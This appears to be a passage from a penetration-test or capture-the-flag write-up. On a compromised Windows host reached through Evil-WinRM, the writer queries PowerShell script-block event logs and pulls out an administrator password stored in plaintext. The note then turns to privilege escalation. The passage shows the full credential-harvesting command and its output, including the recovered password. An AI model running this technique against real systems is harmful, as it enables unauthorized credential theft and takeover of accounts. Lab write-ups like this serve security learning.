Event Log
It has been identified that the current user is part of the Event Log Reader
group on the compromised
host.
Additionally, PEAS was able to read some of the sensitive event logs.
*Evil-WinRM* PS C:\Users\scripting\Documents> Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational';ID=4104} | Select-Object TimeCreated,Id,@{n='Script';e={$_.Properties[2].Value}} | Format-Table -Wrap -AutoSize | findstr "adminpass"
$adminpass = 'TheShellIsMightierThanTheSword!'
net user administrator $adminpass /Y
[System.String]$Content = $adminpass
The password of the administrator
account identified; TheShellIsMightierThanTheSword!
Moving on to the Privilege Escalation phase.